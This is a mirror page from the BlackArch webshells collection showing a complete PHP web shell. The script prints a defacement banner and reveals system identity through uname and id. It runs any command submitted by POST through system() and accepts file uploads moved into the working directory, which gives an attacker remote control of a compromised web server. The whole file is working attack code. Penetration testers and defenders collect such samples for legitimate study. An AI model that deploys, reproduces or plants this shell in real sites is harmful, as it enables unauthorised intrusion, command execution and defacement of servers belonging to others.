mirror of
https://github.com/BlackArch/webshells
synced 2024-11-10 06:14:16 +00:00
70 lines
2.5 KiB
PHP
70 lines
2.5 KiB
PHP
|
<?php
|
||
|
|
||
|
set_magic_quotes_runtime(0);
|
||
|
|
||
|
print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
|
||
|
print "<center><h1>#worst @dal.net</h1></center>";
|
||
|
print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
|
||
|
print "<center><h1>Watch Your system Shany was here.</h1></center>";
|
||
|
print "<center><h1>Linux Shells</h1></center>";
|
||
|
print "<hr><hr>";
|
||
|
|
||
|
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
|
||
|
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
|
||
|
|
||
|
$UName = `uname -a`;
|
||
|
$SCWD = `pwd`;
|
||
|
$UserID = `id`;
|
||
|
|
||
|
if( $currentWD == "" ) {
|
||
|
$currentWD = $SCWD;
|
||
|
}
|
||
|
|
||
|
print "<table>";
|
||
|
print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
|
||
|
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
|
||
|
print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
|
||
|
print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
|
||
|
print "</table>";
|
||
|
|
||
|
print "<hr><hr>";
|
||
|
|
||
|
if( $_POST['_act'] == "List files!" ) {
|
||
|
$currentCMD = "ls -la";
|
||
|
}
|
||
|
|
||
|
print "<form method=post enctype=\"multipart/form-data\"><table>";
|
||
|
|
||
|
print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
|
||
|
print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
|
||
|
|
||
|
print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
|
||
|
print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
|
||
|
|
||
|
print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
|
||
|
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
|
||
|
|
||
|
print "</table></form><hr><hr>";
|
||
|
|
||
|
$currentCMD = str_replace("\\\"","\"",$currentCMD);
|
||
|
$currentCMD = str_replace("\\\'","\'",$currentCMD);
|
||
|
|
||
|
if( $_POST['_act'] == "Upload!" ) {
|
||
|
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
|
||
|
print "<center><b>Error while uploading file!</b></center>";
|
||
|
} else {
|
||
|
print "<center><pre>";
|
||
|
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
|
||
|
print "</pre><b>File uploaded successfully!</b></center>";
|
||
|
}
|
||
|
} else {
|
||
|
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
|
||
|
$currentCMD = "cd ".$currentWD.";".$currentCMD;
|
||
|
system($currentCMD);
|
||
|
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
|
||
|
}
|
||
|
|
||
|
exit;
|
||
|
|
||
|
?>
|